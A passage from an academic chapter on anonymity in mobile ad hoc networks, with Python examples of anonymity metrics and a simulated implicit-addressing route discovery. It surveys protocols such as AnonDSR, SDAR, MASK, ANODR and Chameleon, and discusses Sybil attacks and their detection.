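    """Serjantov & Danezis: 2**H(X), so a larger set of equiprobable users
    scores higher, unlike the Diaz et al. ratio."""
    return 2 ** entropy_bits(probs)


def k_anonymity_excludable(n: int, k: int) -> int:
    """k-anonymity: with k as lower bound on the set size, an attacker can
    exclude at most n - k of the n users."""
    if not (1 <= k <= n):
        raise ValueError("need 1 <= k <= n")
    return n - k


if __name__ == "__main__":
    # Constructed scenario: 10 jondos, one corrupted, forwarding probability 3/4.
    print(crowds_sender_probability(10, 1, 0.75), crowds_innocence_level(10, 1, 0.75))
    print("smallest crowd for probable innocence:", min_crowd_size(1, 0.75))
    posterior = [0.5, 0.25, 0.125, 0.125]   # an attacker's view over four users
    print(degree_of_anonymity(posterior), effective_anonymity_set_size(posterior))
    print(degree_of_anonymity([0.25] * 4), effective_anonymity_set_size([0.1] * 10))
```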
as input to the anonymity metric. Then, the metric determines the degree of anonymity using, for example, analysis or simulation, depending on the metric at hand. In Table 1, we summarize the most common anonymity metrics.

Although the metrics listed above differ in many respects, the main parameters contributing to the degree of anonymity in all metrics are the size of the anonymity set (anonymity set size and k-anonymity), probability distributions (entropy-based metric by Diaz et al.), and both (entropy-based metric by Serjantov and Danezis and the Crowds-based metric).

Anonymous Communication in Mobile Ad Hoc Networks

In proactive routing protocols (Perkins, 2001), each node always maintains routes to all other nodes, including nodes to which no packets are being sent. Standard proactive protocols do not enable anonymity as all nodes know significant amounts of information about other nodes.

In reactive routing protocols (Perkins, 2001), routes between nodes are established on demand, meaning that fewer packets are circulated in the network, for example, for status sensing. Standard reactive routing protocols also fail to enable anonymity. As a proof of concept, consider the reactive protocols dynamic source routing (DSR) (Johnson & Maltz, 1996) and ad hoc on-demand distance vector routing (AODV) (Perkins & Royer, 1999).

• In DSR, during route discovery[4] the route request (RREQ) includes the IP addresses of the sender and receiver in plain. The IPs are also disclosed by the route reply (RREP) message. During data transfer, the path between the sender and receiver is included in plain in the packet headers.
• Also in AODV, the RREQ and RREP messages disclose the sender and receiver IP addresses. Also, routing data at each node in an active path discloses the receiver IP.


This situation applies for virtually any standard routing protocol. So far, two methods for enabling anonymous communication in mobile ad hoc networks have been proposed: anonymous routing protocols and anonymous overlay networks. They are explained in the next sections.

Anonymous Routing Protocols

An anonymous routing protocol replaces the standard routing protocol with a protocol preserving anonymity (see Figure 4). Anonymous routing protocols normally include building blocks for anonymous neighborhood authentication, anonymous route discovery, and anonymous data transfer. The first phase is not always included; instead, many approaches assume that other mechanisms offer this service.

During anonymous neighborhood authentication, nodes establish trust relationships with their neighbors (i.e., nodes within one-hop distance). "Trust" implies that the nodes prove mutual possession of some valid identifiers, such as certificates, pseudonyms, public/private key-pairs, or combinations thereof.

The task of anonymous route discovery is to establish an anonymous path between the sender and receiver. Sender anonymity is often achieved through layered encryption. Sometimes, receiver anonymity is enabled by invisible implicit addressing, meaning in this context that a challenge is included in the RREQ that only the receiver can decrypt[5].

The main disadvantage of invisible implicit addressing is that all nodes receiving the RREQ must try to decrypt the challenge, resulting in considerable overhead (especially as the RREQ reaches all nodes). When the RREP is propagated back to the sender on the path created by the corresponding RREQ message, visible implicit addressing (Pfitzmann & Waidner, 1987) is often used to hinder nodes other than the sender from matching RREP messages with corresponding RREQ messages. This is often enabled by including sequence numbers in the RREP and RREQ so that only the sender can conclude that the sequence number of a given RREP corresponds to an earlier sent-out RREQ.

During anonymous data transfer, data messages are sent along the paths created during route discovery. Only protocols that use source routing can apply layered encryption, as the sender in this case needs to decide the full path. Otherwise, link-to-link encryption, possibly combined with end-to-end encryption, is normally used.

Figure 4. Anonymous routing protocol (figure not reproduced: source and destination stacks with application, transport, and network layers; the anonymous routing protocol sits at the network layer)

Figure 5. Anonymous overlay network (figure not reproduced: an overlay layer carrying the virtual path between source and destination sits above the transport and network layers)
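The route discovery building blocks above, as an added example that is not code from the chapter or from any surveyed protocol: the receiver is addressed in the RREQ by a trapdoor (a fresh nonce and its HMAC under the key the sender shares with the receiver, K_SR) instead of the plain IP addresses DSR and AODV carry; every node must try each key it holds to learn whether the request is for it, which is the overhead the text points out, and the RREP repeats only the request's sequence tag so that nobody but the originator can match reply to request. The node names, topology, keys, and the trapdoor construction itself are constructed for illustration.

```python
"""Invisible implicit addressing for the RREQ and visible implicit addressing
for the RREP, simulated on a constructed five-node network (added example)."""
import hashlib
import hmac
import os
from dataclasses import dataclass, field


@dataclass
class Node:
    name: str
    shared_keys: dict                              # peer name -> 32-byte key
    mac_ops: int = 0                               # HMACs spent on one RREQ
    pending: dict = field(default_factory=dict)    # seq tag -> receiver (sender only)


def trapdoor(key: bytes, nonce: bytes) -> bytes:
    """The challenge: recognisable only by a holder of the same symmetric key."""
    return hmac.new(key, b"rreq" + nonce, hashlib.sha256).digest()


def make_rreq(sender: Node, receiver_name: str) -> dict:
    """No identities in plain: a nonce, its trapdoor under K_SR, and a sequence
    tag the sender remembers (visible implicit address for the RREP)."""
    nonce = os.urandom(16)
    seq_tag = hashlib.sha256(b"seq" + nonce).digest()[:8]
    sender.pending[seq_tag] = receiver_name
    return {"nonce": nonce, "trapdoor": trapdoor(sender.shared_keys[receiver_name], nonce),
            "seq": seq_tag}


def is_for_me(node: Node, rreq: dict) -> bool:
    """Every node tries every key it shares; only the intended receiver matches,
    and a non-receiver pays one HMAC per key before it can give up."""
    for key in node.shared_keys.values():
        node.mac_ops += 1
        if hmac.compare_digest(trapdoor(key, rreq["nonce"]), rreq["trapdoor"]):
            return True
    return False


def make_rrep(rreq: dict) -> dict:
    """The reply carries only the sequence tag, nothing about who replied."""
    return {"seq": rreq["seq"]}


def match_rrep(node: Node, rrep: dict):
    """Only the originator, which remembers seq -> receiver, links the RREP."""
    return node.pending.get(rrep["seq"])


def flood(nodes: dict, rreq: dict, origin: str) -> list:
    """Ad hoc flooding reaches every node except the originator; return the
    names of nodes for which the trapdoor opened."""
    return [n.name for n in nodes.values() if n.name != origin and is_for_me(n, rreq)]


def build_network(names, pairs) -> dict:
    """Constructed network: one random key per listed pair of nodes."""
    nodes = {n: Node(n, {}) for n in names}
    for a, b in pairs:
        k = os.urandom(32)
        nodes[a].shared_keys[b] = k
        nodes[b].shared_keys[a] = k
    return nodes


def run_discovery(nodes: dict, sender: str, receiver: str) -> dict:
    rreq = make_rreq(nodes[sender], receiver)
    matched = flood(nodes, rreq, sender)
    rrep = make_rrep(rreq)
    linked_by = [n.name for n in nodes.values() if match_rrep(n, rrep)]
    return {"matched": matched, "linked_by": linked_by,
            "mac_ops": sum(n.mac_ops for n in nodes.values())}


if __name__ == "__main__":
    net = build_network("ABCDE", [("A", "B"), ("A", "D"), ("B", "C"),
                                  ("C", "D"), ("D", "E"), ("A", "E")])
    print(run_discovery(net, "A", "D"))
```

The `mac_ops` count grows with the number of keys each node holds times the number of nodes the flood reaches, which is the scalability cost the AnonDSR, SDAR, and ANODR evaluations later return to.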

Anonymous Overlay Networks

In mobile ad hoc networks, anonymous overlay networks are normally deployed above the routing or transport layer (see Figure 5), where they can use services from the standard routing protocol (e.g., finding a route to the next node in the path) or the transport layer (e.g., reliable data delivery).

Anonymous overlay networks can be divided into the following phases: group buildup, path construction, and data transfer.

During group buildup, the user base of the overlay network is populated. One strategy for group buildup is to assign this task to one or more directory servers, where a set of nodes (or at least one node) must act as a directory server (Martucci, Andersson, & Fischer-Hübner, 2006). Similarly as in anonymous routing protocols, virtual path setting and data transfer are either based on layered encryption, or on link-to-link encryption combined with end-to-end encryption.

Comparison between Anonymous Routing Protocols and Anonymous Overlay Networks

In Table 2 we summarize the respective pros and cons of anonymous routing protocols and anonymous overlay networks.

Table 2. Pros and cons of anonymous routing protocols and anonymous overlay networks

Advantages of anonymous routing protocols: They make it possible to control already on the routing level what information is being disclosed during routing. Yet, this does not exclude the possibility that additional efforts may be needed in upper layers. Also, most approaches use the shortest path between the sender and receiver.

Disadvantages of anonymous routing protocols: The replacement of the standard routing protocol; this will likely decrease the user base, which degrades anonymity according to many metrics. Besides, nodes may be exposed if a connection-oriented transport layer is used above the anonymous routing protocol, as such transport layers establish direct connections between nodes.

Advantages of anonymous overlay networks: Flexibility; an anonymous overlay network is independent of the routing protocol and, further, compatible with applications expecting services from, for example, a reliable transport layer.

Disadvantages of anonymous overlay networks: The performance can be expected to be slightly worse as messages are detoured through a set of overlay nodes, instead of being transmitted on the shortest route between the sender and recipient.

Survey of Anonymous Communication Mechanisms for Ad Hoc Networks

The survey is divided into two parts: one part for anonymous routing protocols and one for anonymous overlay networks[6]. Before the survey, however, we list the evaluation criteria against which the mechanisms included in the survey are evaluated.

Evaluation Criteria

Six requirements were defined by Andersson et al. (2005) that an anonymous overlay network should meet to be suitable for mobile ad hoc networks. These requirements are general enough to be suitable for providing the criteria against which the mechanisms surveyed in this chapter are evaluated. They are listed below:

R1. The anonymous communication mechanism must scale well. It should perform well also with a large number of participants.

R2. The anonymous communication mechanism must provide strong anonymity properties. We examine how the studied approaches resist an attacker model including a global observer[7], path insiders, other network nodes, and the receiver.


R3. The anonymous communication mechanism must be fair regarding the distribution of workload among the nodes. The workload should be equally distributed (and nodes should not be forced to spend a lot of resources on behalf of others). Otherwise, incentives should be given for accepting a higher workload.

R4. The anonymous communication mechanism must provide acceptable performance. It should be lightweight (e.g., generate few messages and avoid public key operations). We evaluate whether the studied approaches present arguments indicating good performance. We also evaluate whether there are strong assumptions that could hamper performance.

R5. The anonymous communication mechanism must employ a peer-to-peer (P2P) paradigm. There should be no dependence on central hardware/services, or at least, it should be minimized. We also study whether there are some implicit requirements for centralized services that are hidden by strong assumptions.

R6. The anonymous communication mechanism must handle a dynamic topology. It must tolerate that nodes are frequently entering or leaving the network.

In the survey, we grade the approaches according to the degree to which they satisfy these requirements, using four ratings: the requirement is satisfied to a high degree; satisfied to a medium degree; satisfied to a low degree; or violated. Regarding the grading of R2, the approaches are graded according to the degree to which they provide anonymity against each item in the assumed attacker model (see R2).

Survey of Anonymous Routing Protocols

In this section, we survey a variety of prominent anonymous routing protocols proposed in recent years. The ratings of the mechanisms are listed in table form in the next section.

Anonymous Dynamic Source Routing Protocol (AnonDSR)

AnonDSR (Song, Korba, & Yee, 2005) is a source routing protocol using invisible implicit addressing for route discovery. The RREP is created as a message onion. Both the sender and recipient know the intermediary nodes in the path. Data messages are sent as message onions on bidirectional paths. AnonDSR includes a security parameter establishment (SPE) protocol for exchanging security parameters prior to route discovery, which contains a major flaw (see R2).

R1. As the SPE protocol is used to establish shared secrets between senders and receivers, the issues regarding it (see R2) may hamper scalability.
R2. The SPE protocol broadcasts the IDs of the senders and receivers in plain. If used, AnonDSR provides merely confidentiality. If not used, AnonDSR provides sender and receiver anonymity against observers, path insiders, and network nodes. AnonDSR changes the message appearance at intermediary hops. Yet, a global observer may correlate the RREQ sizes or trace data flows in the network.
R3. During route discovery, nodes spend energy to assess whether they are the intended receiver. Intermediary nodes must perform public key encryptions.
R4. The range of the nodes and the network size are not specified in the performance simulation of AnonDSR, and only route discovery is evaluated, while data transfer and node mobility are not considered. Also, as implicit addressing with public key cryptography is used, AnonDSR cannot be expected to provide high performance.
R5. No special nodes are needed, and thus AnonDSR adheres well to the P2P paradigm.
R6. AnonDSR does not support rebuilding of broken paths. Also, the insecurities in the SPE protocol may cause problems for new nodes joining the network that wish to establish security parameters with existing nodes.


Secure Distributed Anonymous Routing Protocol (SDAR)

SDAR (Boukerche, El-Khatib, Xu, & Korba, 2004) is a source routing protocol enabling a system for managing trust: nodes associate their neighbors with a trust level based on past behavior. Invisible implicit addressing is used to hide the receiver identity in the RREQ. The RREP and data messages are sent as message onions.

R1. SDAR can be expected to scale badly as every node in the network must perform three public key operations per received RREQ message.
R2. SDAR offers sender and receiver anonymity against observers and other network nodes. SDAR alters message appearance and applies padding to thwart global observers. Still, only nodes assumed to forward RREQ/RREP packets do so; others drop them.
R3. It is not specified whether the certificate authority (CA) is a central service or distributed among the nodes. When processing RREQ packets, all nodes must perform one public key encryption, one public key decryption, and one signature generation.
R4. There are serious performance issues in SDAR. For instance, every node must perform three public key operations for each RREQ it forwards.
R5. The existence of a CA (or similar) is assumed for distributing public keys. It is not specified how it would be implemented.
R6. We predict that the trust management system in SDAR would suffer in a dynamic topology; it would be difficult for nodes to be highly trusted as they would be "punished" for leaving the network in the midst of a communication. Also, path rebuilding in case of broken paths is not considered.

MASK

MASK (Zhang, Liu, & Lou, 2005) does not use source routing. Prior to route discovery, MASK performs anonymous neighborhood authentication, and nodes know each other by temporal pseudonyms. For performance reasons, MASK avoids invisible implicit addressing during route discovery; instead, the receiver identity is disclosed in the RREQ. After route discovery, a sender may have multiple active paths to the receiver. End-to-end and/or link-to-link encryption is employed during data transfer, depending on the application at hand.

R1. MASK can be expected to scale well as it avoids the usage of implicit addressing. Yet, an increased node density (i.e., more neighbor nodes) may degrade performance during anonymous neighborhood authentication.
R2. MASK offers sender anonymity against path insiders, network nodes, and observers, but no receiver anonymity. MASK uses altered message appearance, random choice of paths, and per-hop message delay to harden traffic analysis during low traffic. No node forwards RREQ/RREP messages more than once.
R3. The avoidance of implicit addressing has a positive impact on fairness.
R4. Simulation results indicate that MASK provides good performance. However, the mutual authentication between neighboring nodes was shown to be the most costly operation, and in scenarios where the transmission range is small compared to the network size, this may affect performance negatively.
R5. A trusted authority (TA) is used during the bootstrapping phase of the network.
R6. Broken paths are handled by broadcasting error packets in case of a broken path. Still, the tight synchronization scheme between neighboring nodes may lead to problems in situations where neighboring nodes leave and join often.

Anonymous On-Demand Routing (ANODR)

ANODR (Kong, Hong, Sanadidi, & Gerla, 2005) is a source routing protocol aiming to protect privacy by avoiding persistent identifiers. Invisible implicit addressing based on symmetric encryption is used to hide the receiver identity during route discovery.


Privacy and Anonymity in Mobile Ad Hoc Networks

The RREP is created as a message onion. During data transfer, it is not specified whether or not the data payload is encrypted.
R1. It is unclear how senders and receivers share symmetric keys. Given that they share a key, to solve the challenge in the RREQ, the receiver may have to try all keys shared with other nodes (see R4). Further, other network nodes must try all their shared keys to conclude that they are not the intended receiver.
R2. ANODR offers sender and receiver anonymity against observers, path insiders, and network nodes. Senders and receivers are not mutually anonymous. ANODR uses traffic mixing to thwart observers, where messages are independently and randomly delayed. Yet, traffic patterns are leaked, as only the nodes assumed to forward the RREP do so. Further, as the payload of data messages is not altered at intermediary hops, it is trivial for a global observer to trace data traffic.
R3. Each node must spend considerable resources when forwarding RREQ packets.
R4. There are serious performance issues in ANODR (see R1). Although ANODR has performed reasonably well in a simulation scenario, problems can be expected in a real world scenario.
R5. No special nodes are needed, and thus ANODR adheres well to the P2P paradigm.
R6. ANODR supports path rebuilding in case of broken paths. However, it is unclear how new nodes should share symmetric keys with old nodes.

Discount Anonymous On-Demand Routing (Discount ANODR)

Discount ANODR (Yang, Jakobsson, & Wetzel, 2006) is a low-latency source routing protocol that avoids invisible implicit addressing. A random time-to-live counter is used for RREQ/RREP messages to confuse observers (implemented by flipping a biased coin). Data are sent as message onions along unidirectional paths (i.e., a new path must be built for the reply).
R1. Discount ANODR can be expected to scale well. However, the bias of the coin flipping may have to be adapted if the geographical size of the network increases.
R2. Discount ANODR provides sender anonymity against local observers, as the coin flipping and random padding during route discovery confuse observers to a certain degree. No receiver anonymity. Data messages are padded with random bits.
R3. There are no special nodes and no public key encryption on behalf of other nodes.
R4. Discount ANODR avoids public key encryption and invisible implicit addressing. The coin flipping may degrade performance, as nodes on the shortest path may drop the RREQ, resulting in non-optimal paths. Also, RREP packets can be lost for the same reason. Unidirectional paths also hamper performance.
R5. The nodes have to collectively administer two values determining the bias of the coins deciding whether a node should forward a RREQ and a RREP, respectively.
R6. Discount ANODR rebuilds broken paths, but does not discuss how to collectively adapt the bias of the coin flipping when the network characteristics change.

Anonymous Routing Protocol for Mobile Ad Hoc Networks (ARM)

ARM (Seys & Preneel, 2006) aims to foil global observers by using random time-to-live values and padding for all messages. Senders and receivers share one-time pseudonyms. Invisible implicit addressing hides the receiver by including the secret pseudonym in the RREQ. The RREP is created as a message onion. Link-to-link encryption is used for data transfer.
R1. As a tight synchronization scheme is used between sender and recipients, it is assumed that senders share keys and pseudonyms


with a limited set of receivers.
R2. ARM offers sender and receiver anonymity against network nodes, path insiders, and observers. Senders and receivers have an a-priori relationship. In ARM, data messages have a uniform size, RREQ/RREP messages are randomly padded, and RREQ/RREP/data messages are propagated using random time-to-live values. The effectiveness of this limited dummy traffic is not formally proven.
R3. While no nodes perform public key operations, the number of nodes forwarding RREQ/RREP and data messages increases due to the random time-to-live values.
R4. Assuming a static environment, there are no conclusive arguments regarding performance. However, all nodes in ARM generate overhead traffic. ARM has not yet been simulated to assess the performance.
R5. There are no special nodes in ARM. In a real world scenario, central infrastructure may be required to realize the assumption that each node should possess a unique identifier; it is unclear how this would clash with the P2P paradigm.
R6. The assumption that each node establishes a broadcast key with its neighbors is problematic when considering dynamic topologies. Further, ARM does not consider path rebuilding in case of broken paths.

Distributed Anonymous Secure Routing Protocol (ASRP)

ASRP (Cheng & Agrawal, 2006) is a routing protocol not based on source routing, where nodes are known by dynamic random pseudonyms. Invisible implicit addressing (based on public key encryption) is used for both RREQ and RREP packets. Data messages are link-to-link and end-to-end encrypted. It is not specified whether the paths are bidirectional or unidirectional.
R1. All nodes in the network must perform two public key operations per RREQ (one private key decryption and one public key generation). This hampers scalability, as the more nodes in the network, the more RREQ packets are generated.
R2. Senders and receivers are not mutually anonymous, as they have an a-priori relationship. Anonymity is offered against path insiders and network nodes, and ASRP alters message appearance and maintains a uniform message size to confuse attackers.
R3. All nodes spend significant resources when forwarding RREQ and RREP packets. For the RREQ, see R1. For propagation of RREP packets, all nodes on the path must perform three public key operations (one private key decryption and two public key encryptions).
R4. The performance of ASRP has not been simulated. Route discovery can be expected to offer low performance, as public key encryption is extensively used.
R5. No special nodes are needed, and thus ASRP adheres to the P2P paradigm.
R6. Path rebuilding in case of broken paths is not considered. This means that the expensive route discovery process has to be initiated for each case of path failure.

Privacy Preserving Routing (PPR)

PPR (Capkun, Hubaux, & Jakobsson, 2004) is a proactive protocol for communication between ad hoc networks interconnected by fixed access points (AP). Nodes know each other by temporal pseudonyms. In the sender's network, nodes maintain the shortest path to the AP. In the receiver's network, the AP maintains the shortest paths to the nodes. Routing consists of three parts: uplink (distance vector protocol), inter-station, and downlink (source routing). In uplink, a sender sends a message that reaches the AP as a message onion. In downlink, the receiver's AP sends an onion to the receiver.
R1. The AP and the CA are the major points of workload aggregation in PPR, but as these are centrally offered services, PPR can be expected to scale well.
R2. PPR offers sender and receiver anonymity



against observers, network nodes, and path insiders. There are no countermeasures against global observers in the sender's or receiver's networks, except message alteration at intermediary hops. Anonymity is quantified using the entropy-based anonymity metric (see section "On Measuring Anonymity"). There is no anonymity against the AP.
R3. Nodes do not perform special roles or execute public key operations on behalf of others.
R4. Public key encryption is only used for establishing trust relationships among neighboring nodes. The performance of PPR has not yet been simulated.
R5. PPR violates the P2P model, as the existence of a CA and several APs is assumed.
R6. The existence of the APs facilitates the handling of trust and security issues in a dynamic topology. The uplink protocol is the most vulnerable part regarding routing, but it can be expected to handle dynamic topologies well.

Summary of Survey Results for Anonymous Routing Protocols

The survey results for all requirements (except R2) are summarized in Table 3. The survey results for R2 are summarized in Table 4.

Table 3. Summary of survey results (except R2)

Requirement      | ARM | AnonDSR | ANODR | SDAR | Discount ANODR | ASRP | MASK | PPR
R1: Scalability  |     |         |       |      |                |      |      |
R3: Fairness     |     |         |       |      |                |      |      |
R4: Performance  |     |         |       |      |                |      |      |
R5: P2P          |     |         |       |      |                |      |      |
R6: Dyn. Top.    |     |         |       |      |                |      |      |

Table 4. Summary of anonymity requirement R2 (✓ anonymity offered, ✗ not offered)

Attacker model        | ARM | AnonDSR | ANODR | SDAR | Discount ANODR | ASRP | MASK | PPR⁸
Sender – observer     | ✓   | ✓       | ✓     | ✓    | ✓              | ✓    | ✓    | ✓
Sender – path insider | ✓   | ✓       | ✓     | ✓    | ✓              | ✓    | ✓    | ✓
Sender – net. node    | ✓   | ✓       | ✓     | ✓    | ✓              | ✓    | ✓    | ✓
Sender – receiver     | ✗   | ✗       | ✗     | ✗    | ✗              | ✗    | ✗    | ✗
Rec. – observer       | ✓   | ✓       | ✓     | ✓    | ✗              | ✓    | ✗    | ✓
Rec. – path insider   | ✓   | ✓       | ✓     | ✓    | ✗              | ✓    | ✗    | ✓
Rec. – net. node      | ✓   | ✓       | ✓     | ✓    | ✗              | ✓    | ✗    | ✓

Survey of Anonymous Overlay Networks

In this section, we study two anonymous overlay networks for ad hoc networks: Chameleon (Martucci et al., 2006) and MRA (Jiang, Vaidya, & Zhao, 2004).

Chameleon

Chameleon can be described as a variant of Crowds adapted for mobile ad hoc networks. In Chameleon, the nodes share the responsibility of being directory servers during group buildup. Node authentication is based on certificates (the existence of a TCP (transmission control protocol)/SSL (secure



socket layer) layer is assumed). Data messages are end-to-end and link-to-link encrypted, or only link-to-link encrypted.
R1. The load on each node is approximately constant as the size of the network grows. However, if too few directory servers are used, this may put a limit on scalability.
R2. Chameleon offers sender anonymity against receivers, and sender and receiver anonymity against local observers and malicious nodes. The degree of anonymity is quantified by the Crowds-based metric (see "On Measuring Anonymity").
R3. A small subset of the nodes must act as directory servers. It is suggested that nodes take turns in acting as the directory servers.
R4. Chameleon is based on light-weight encryption. However, the performance of Chameleon has not yet been assessed through simulation.
R5. Chameleon generally follows the P2P paradigm. However, nodes are assumed to possess certificates obtained in advance, and the global probability deciding the expected path length has to be administered collectively by the nodes.
R6. Chameleon repairs broken paths at the point of breach, rather than rebuilding the whole path. Without redundancy, vanishing directory servers may be a problem.

Mix Route Algorithm (MRA)

MRA applies traffic mixing⁹ (Chaum, 1981) in a mobile ad hoc scenario. A subset of the nodes acts as mixes, which constitute the virtual paths. Each node assigns a mix as its dominator mix. A RREQ is sent to the receiver via the sender's dominator mix, triggering the receiver to register at its dominator mix with a DREG (dominator registration) message. Each mix periodically broadcasts RUPD (route update) messages containing its registered receivers and a path field, which is updated as the RUPD propagates through the network. When it reaches the sender, it contains the path to the receiver.
R1. Scalability may be hampered if the mix set is static in a growing network.
R2. As the minimum path length is one, a mix may learn the identity of both the sender and the receiver. The first mix always learns the sender ID. Receiver anonymity is in doubt, as every mix broadcasts information in the network about which receivers it is currently providing services for (i.e., the RUPD messages).
R3. Incentives for the costly operation of mixes are left as a future research problem.
R4. MRA is based on public-key cryptography. Basing MRA on symmetric cryptography is left as future research. Results from a performance simulation are presented, but only different mix settings are compared.
R5. No central services are needed. Still, establishing trust between mixes and other nodes is left as future research. This may require aid from external trusted nodes.
R6. If the sender or the dominator mix moves, the sender may have to switch dominator mix. If the mix set is small, problems may arise regarding the mix advertisement, as nodes only retransmit advertisement messages from their dominator mixes.

Summary of Survey Results for Anonymous Overlay Networks

The results from the survey are summarized in Table 5.

Discussion

From the survey, we can make the following observations:
1. It is difficult to protect against a global eavesdropper. None of the studied approaches implement powerful and proven countermeasures against global observers. We believe that it is an open research problem how to enable such countermeasures while at the same time offering an



Table 5. Summary of survey results (left) and summary of anonymity requirement R2 (right; ✓ anonymity offered, ✗ not offered)

Requirement      | Chameleon | MRA
R1: Scalability  |           |
R3: Fairness     |           |
R4: Performance  |           |
R5: P2P          |           |
R6: Dyn. Top.    |           |

Attacker model        | Chameleon | MRA
Sender – observer     | ✓         | ✓
Sender – path insider | ✓         | ✗/✓¹⁰
Sender – net. node    | ✓         | ✓
Sender – receiver     | ✓         | ✗
Rec. – observer       | ✓         | ✓
Rec. – path insider   | ✗         | ✗/✓¹¹
Rec. – net. node      | ✓         | ✓

acceptable level of performance in mobile ad hoc networks¹².
2. It is difficult to implement invisible implicit addressing efficiently. There is a clear trade-off between, on the one hand, enabling receiver anonymity by using invisible implicit addressing and, on the other hand, satisfying the fairness, dynamic topology, and scalability requirements. The proposals using invisible implicit addressing either use costly public key cryptography (e.g., AnonDSR, SDAR, ASRP) or avoid public key operations at the cost of strong assumptions regarding the mutual distribution of secrets beforehand (e.g., ARM, ANODR).
3. It is straightforward to hide the identity of the sender from other network nodes. This is probably because most of the approaches use classical techniques for hiding the identity of the sender, such as layered encryption, that have been used before in other contexts.
4. No anonymous routing protocol implements sender anonymity towards the receiver. Hiding the sender identity during route discovery would require a mechanism for hiding the propagation of the RREP messages similar to (and equally costly as) the invisible implicit addressing schemes used for hiding the propagation of the RREQ messages.

Future Trends

A Sybil attack (Douceur, 2002) implies one attacker forging multiple identifiers in the network to control an unbalanced portion of the network. Sybil attacks can undermine security in, for instance, mobile ad hoc networks based on reputation schemes or threshold cryptography (Piro, Shields, & Levine, 2006). Douceur has shown that preventing Sybil attacks is practically impossible, as it requires a TTP (trusted third party) to manually assert that each identity corresponds to only one logical entity in the network. Yet, over the years, and recently also for mobile ad hoc networks, many approaches for detecting Sybil attacks have been proposed. In this section, we discuss why Sybil attacks threaten anonymity in ad hoc networks, and discuss some proposed countermeasures.

The Sybil Attack in Mobile Ad Hoc Networks

Mobile ad hoc networks are highly susceptible to Sybil attacks because of, for instance, the lack of reliable network or data link identifiers, and the absence of a trusted entity capable of vouching for the one-to-one binding between physical devices and logical network identifiers. This may give the impression that ad hoc nodes are naturally anonymous, as nodes could confuse observers by regularly changing their {IP, MAC} pairs. Although this may prevent long-term tracking, other problems may arise. For instance, when there is a need to identify a node offering a specific service, a rogue node could easily impersonate this service. The



absence of reliable network identifiers may also disrupt routing, as a rogue user could announce false information using multiple {IP, MAC} pairs. Also, as senders and receivers establish direct connections, they are still vulnerable to traffic analysis and physical layer oriented attacks (Capkun et al., 2004).
However, the Sybil attack also poses a threat against anonymous routing protocols and anonymous overlay networks. For both approaches, the anonymity set denotes the user base. There are some differences, though. In an anonymous overlay network, the anonymity set is used as a pool of nodes serving as an input parameter to the path creation algorithm. Polluting the anonymity set with many Sybil identities might yield a path only containing Sybil identities. If this happens, the attacker can easily break anonymity by linking the sender to the receiver. In an anonymous routing protocol, however, each node only stepwise extends the path to another node within single-hop distance, until the receiver is reached. Thus, the locations of the nodes play a more important role here, and as all Sybil identities share the same location, it is difficult for the attacker to force the creation of paths in which it controls all nodes.
Thus, the Sybil attack poses a greater threat to anonymity in anonymous overlay networks compared to anonymous routing, although it still poses a great threat to other security properties of anonymous routing.

Mechanisms for Detecting the Sybil Attack in Mobile Ad Hoc Networks

In this section, we describe two recent proposals for thwarting Sybil attacks in mobile ad hoc networks.
• The fact that Sybil nodes in mobile ad hoc networks naturally travel together in clusters can be used for detecting Sybil attacks (Piro et al., 2006). Piro et al. propose a detection mechanism in which each node records all encountered {IP, MAC} pairs. If a user repeatedly observes a set of {IP, MAC} pairs sharing the same location, there is an increased likelihood that these {IP, MAC} pairs represent Sybil nodes. One drawback with this strategy is that it is unclear how to prevent a detected attacker from generating new {IP, MAC} pairs and relaunching a new attack later, as there is no underlying long-term identity that can be blocked from the system.
• Another strategy is to cryptographically guarantee a one-to-one mapping between all temporal network identifiers seen in a particular network and corresponding certified long-term identifiers (Martucci et al., 2008). To tailor this approach for ad hoc networks, the nodes must be able to assert the validity of the temporal identifiers without having to interact with the TTP. Further, to protect privacy, only the TTP should be able to link a temporal identifier to the corresponding long-term identifier, and there should be unlinkability between temporal identifiers used in different contexts. The fact that one needs reliable identifiers both to protect against the Sybil attack and to provide reliable anonymous communication has been labeled the identity-anonymity paradox (Martucci et al., 2006).

Conclusion

In mobile ad hoc networks, anonymous communication can be enabled either by anonymous routing protocols or by anonymous overlay networks. Currently, anonymous routing is the most popular approach, although future requirements, such as flexibility regarding the applications, may raise the need for anonymous overlay networks.
We evaluated commonly proposed anonymous routing protocols and anonymous overlay networks for mobile ad hoc networks against a set of evaluation criteria and showed that a number of research challenges remain. For instance, it is difficult to offer receiver anonymity without using a complex and performance-hampering invisible implicit addressing scheme, and it is further difficult to protect against global observers.
Finally, we introduced Sybil attacks, a notorious



threat to all computer networks, including mobile ad hoc networks. We expect that the area of enabling reliable identifiers in a privacy-friendly manner is an interesting future research area.

References

Andersson, C., Martucci, L. A., & Fischer-Hübner, S. (2005). Requirements for privacy enhancements in mobile ad hoc networks. In Proceedings of the 3rd German Workshop on Ad Hoc Networks (WMAN 2005) (pp. 344-348). Gesellschaft für Informatik (GI).

Boukerche, A., El-Khatib, K., Xu, L., & Korba, L. (2004). A novel solution for achieving anonymity in wireless ad hoc networks. In Proceedings of the 7th ACM International Symposium on Modeling, Analysis and Simulation of Wireless and Mobile Systems (pp. 30-38).

Capkun, S., Hubaux, J. P., & Jakobsson, M. (2004). Secure and privacy-preserving communication in hybrid ad hoc networks (EPFL-IC Tech. Rep. No. IC/2004/10). Lausanne, Switzerland: Laboratory for Computer Communications and Applications (LCA)/Swiss Federal Institute of Technology Lausanne (EPFL).

Chaum, D. (1981). Untraceable electronic mail, return addresses, and digital pseudonyms. Communications of the ACM, 24(2), 84-88.

Cheng, Y., & Agrawal, D. P. (2006). Distributed anonymous security routing protocol in wireless mobile ad hoc networks. Paper presented at OPNETWORK 2005.

Corson, M. S., & Macker, J. (1999). Mobile ad hoc networking (MANET): Routing protocol performance issues and evaluation considerations (RFC 2501). Internet RFC/STD/FYI/BCP Archives.

Díaz, C., Seys, S., Claessens, J., & Preneel, B. (2002). Towards measuring anonymity. In Proceedings of the Workshop on Privacy Enhancing Technologies (PET 2002) (LNCS 2482). Springer-Verlag.

Douceur, J. R. (2002). The Sybil attack. In P. Druschel, F. Kaashoek, & A. Rowstron (Eds.), Peer-to-peer systems: Proceedings of the 1st International Peer-to-Peer Systems Workshop (IPTPS) (pp. 251-260). Springer-Verlag.

Goldschlag, D. M., Reed, M. G., & Syverson, P. F. (1996). Hiding routing information. In Information hiding (LNCS 1174, pp. 137-150). Springer-Verlag.

